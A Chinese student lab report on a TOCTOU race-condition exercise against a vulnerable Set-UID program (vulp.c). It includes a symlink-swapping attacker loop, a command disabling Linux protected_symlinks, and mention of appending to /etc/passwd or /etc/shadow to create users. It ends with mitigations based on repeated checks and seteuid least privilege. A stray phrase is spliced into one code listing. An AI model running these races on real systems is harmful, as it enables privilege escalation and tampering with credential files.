竞态条件漏洞实验
竞态条件漏洞实验
实验准备
竞态条件是指多个线程同时访问或者操作同⼀块数据,运⾏的结果依赖于不同线程访问数据的顺序。如果⼀个拥有root权限的程序存在竞态条件漏洞的话,攻击者可以通过运⾏⼀个平⾏线程与漏洞程序竞争,以此改变该程序的⾏为。
利⽤vulp.c中的竞态条件漏洞可以做很多事情。其中⼀种是利⽤漏洞在 /etc/passwd 和 /etc/shadow 后追加信息。这两个⽂件是unix做⽤户授权⽤的,攻击者有可能利⽤这点创建⽤户,甚⾄是超级⽤户。
可以通过调⽤c函数symlink()创建连接。因为linux不允许创建已经存在的连接,我们需要先删除旧链接,下⾯的C代码演⽰如何移除⼀个旧链接并使/tmp/XYZ指向/etc/passwd:
unlink("/tmp/XYZ");
symlink("/etc/passwd","/tmp/XYZ");
或者使⽤命令ln -sf 创建链接,f选项意味着覆盖原链接。ln命令的内部实现本⾝就包含上⽂的两个函数。
最重要的⼀步(创建指向⽬标⽂件的链接)发⽣在调⽤access函数与fopen函数之间。我们⽆法更改漏洞程序,那么唯⼀能做的就是运⾏攻击程序,希望链接操作能在那段时间内发⽣。如果间隙很⼩的话,攻击成功率就⽐较渺茫了。所以你需要写程序⾃动化你的攻击流程,反复进⾏攻击,为避免⼿动输⼊vulp程序。你可以使⽤命令./vulp < FILE(FILE是你 scanf 的⽂本⽂件)。
普通⽤户⽆法访问shadow⽂件中的内容,那该如何知道⽂件是否被更改呢?可以看时间戳!⽽且⼀旦得知攻击成功就停⽌攻击这样做会更好⼀点,以下shell命令检查⽂件时间戳是否更改:
#!/bin/sh
#注意`不是单引号
old=`ls -l /etc/shadow`
new=`ls -l /etc/shadow`
while [ "$old" = "$new" ]
do
new=`ls -l /etc/shadow`
done
echo " The shadow file has been changed"
实验内容
由于本实验环境开启了针对竞态条件攻击的保护,所以需要先关掉保护。该选项意味着全域可写sticky位开启的⽂件夹是不能作为链接⽬标所在⽂件夹的。
$ sudo su
$ echo 0 > /proc/sys/fs/protected_symlinks
$ exit
下⾯是vulp.c的代码,看似⽆害,实则包藏祸⼼:
//vulp.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define DELAY 10000
int main()
{
char * fn = "/tmp/XYZ";
char buffer[60];
FILE *fp;
long int i;
/* get user input */
scanf("%50s", buffer );
if(!access(fn, W_OK)){
/
*为了增加实验成功率增加的延迟*/
for(i=0; i < DELAY; i++){
int a = i^2;
}
fp = fopen(fn, "a+");
fwrite("\n", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
}
else printf("No permission \n");
}
这是⼀个Set-UID程序(root所有) 它将⽤户输⼊的字符串添加到⽂件 /tmp/XYZ 后,access()会检查⽤户是否具备访问资源的权限,也就是说该函数检查real id⽽不是effective id。
这个程序第⼀眼看上去没有任何问题,但是这⾥有⼀个竞态条件漏洞。由于检查(access)与访问(fopen)之间存在时间间隙,所以检查与访问的就有可能不是同⼀个⽂件,即使它们的名字相同。如果⼀个恶意攻击者可以创建⼀个/tmp/XYZ/链接指向/etc/shadow,输⼊的字符串就会追加到shadow⽂件中去。
现在我们来重写拥有者为root的任意⽂件:
⾸先如下图创建⼏个⽂件,注意这⼏个⽂件的权限。在append_text⽂件中加⼊你想要在root_file⾥加⼊的任意内容。编译漏洞程序代码并将其设
为SET-UID⽂件。
这⾥⾯append_text⽂件时输⼊⽂件,root_file是⽬标⽂件,vulp是漏洞⽂件。
然后是检查时间戳的脚本check.sh,将运⾏vulp的命令加⼊其中,然后使⽤chmod u+x check.sh命令给脚本运⾏权限。attacker.c是攻击代码:
int main()
{
while(1){
system("ln -sf /home/seed/race/tmp_file /tmp/XYZ");
system("ln -sf /home/seed/race/root_file /tmp/XYZ");
}
return 0;
}
攻击前,⽂件append_text和root_file中内容:
攻击时,先运⾏attacker,再运⾏check.sh:
然后再次查看root_file中的内容:
实验结果和应该的有所差距,具体原因尚未出。但是从⽂件内容来看,所有权是root的⽂件内容确实被修改了。
保护机制
保护机制A:重复
想要避免竞态条件的发⽣并不轻松,因为先检查再访问这个模式在很多程序中都是需要的。但是我们可以增加更多的竞态条件,这样就能减⼩攻击者攻击成功的概率了。该机制的基础思想是重复access和fopen函数的次数。如我们把漏洞程序修改成如下:
#include <stdio.h>
#include <unistd.h>
#define DELAY 10000
int main()
{
char * fn = "/tmp/XYZ";
char buffer[60];
FILE *fp;
long int i;
/* get user input */
scanf("%50s", buffer );
if(!access(fn, W_OK)){
if(!access(fn, W_OK)){
/*嵌套n层*/
fp = fopen(fn, "a+");
fwrite("\n", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
}
else printf("No permission \n");
}
else printf("No permission \n");
}
保护机制B:最⼩权限原则
该程序的根本问题就在于它违反了最⼩权限原则,程序员认识到运⾏这个程序的⽤户可能权利过⼤,所以引⼊access函数进⾏限制,但也同时引⼊了竞态条件的隐患。
更好的⽅法是使⽤seteuid系统调⽤暂时禁⽌root权限,当需要时再恢复。
#include <stdio.h>
#include <unistd.h>
#define DELAY 10000
int main()
{
char * fn = "/tmp/XYZ";
char buffer[60];
FILE *fp;
long int i;
/* get user input */
scanf("%50s", buffer );
uid_t euid = geteuid();
seteuid(getuid());
for (i=0; i < DELAY; i++){
int a = i^2;
}shell创建文件并写入内容
if (fp = fopen(fn, "a+")){
fwrite("\n", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
}
else printf("No permission \n");
seteuid(euid);
}
实验分析
刚开始时候实验⽼是权限限制,后来发现/tmp/XYZ是root持有的⽂件,原来是之前先运⾏了vplu,vulp发现不存在/tmp/XYZ这个⽂件,就会以root 权限创建这个⽂件,那么我们的攻击程序就不能对⽂件进⾏修改,导致攻击失败。所以攻击时要⾸先运⾏attacker,再运⾏check.sh。
刚开始实验时候,输⼊是“hello Chengwenwen”,但是发现每次向root_file⽂件中写⼊的字符只有hello,空格和之后的内容没有了,经过向⽼师询问才发现输⼊⽂件的字符串(即append_text中内容)不能有空格。后来经过在⽹上查询资料才知道,scanf()输⼊时候遇到空格会从空格处折断,不再读取后⾯的内容。
原理分析
操作系统进程调度的本质是时间⽚轮转,⼀个进程可能在任何时刻被调度,转⽽运⾏第⼆个程序。竞争条件漏洞就是因为这种调度出现的漏洞。当⼀个程序本应连续执⾏的两步被打断,切换到另⼀进程时,这个进程可能对原来进程需要的资源进⾏修改,导致原程序的执⾏发⽣错误。本次实验中修改的
就是程序操作⽂件指向的对象。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。